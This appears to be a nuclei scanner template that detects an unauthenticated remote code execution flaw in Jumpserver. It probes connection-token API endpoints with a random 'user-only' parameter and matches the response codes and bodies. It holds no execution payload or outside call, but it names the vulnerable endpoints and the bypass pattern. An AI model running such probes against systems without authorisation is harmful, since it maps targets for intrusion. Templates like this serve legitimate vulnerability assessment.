id: jumpserver-unauth-rce

info:
  name: Jumpserver Unauth RCE
  author: SleepingBag945
  severity: critical
  description: |
    Jumpserver

variables:
  r1: "{{rand_base(5)}}"

http:
  - raw:
      - |
        GET /api/v1/authentication/connection-token/ HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /api/v1/authentication/connection-token/?user-only={{r1}} HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /api/v1/users/connection-token/ HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /api/v1/users/connection-token/?user-only={{r1}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: or
    matchers:
      - type: dsl
        dsl:
          - status_code_1==401
          - status_code_2==404
          - contains(body_1, 'not_authenticated')
          - body_2=="\"\""
        condition: and

      - type: dsl
        dsl:
          - status_code_3==401
          - status_code_4==404
          - contains(body_3, 'not_authenticated')
          - body_4=="\"\""
        condition: and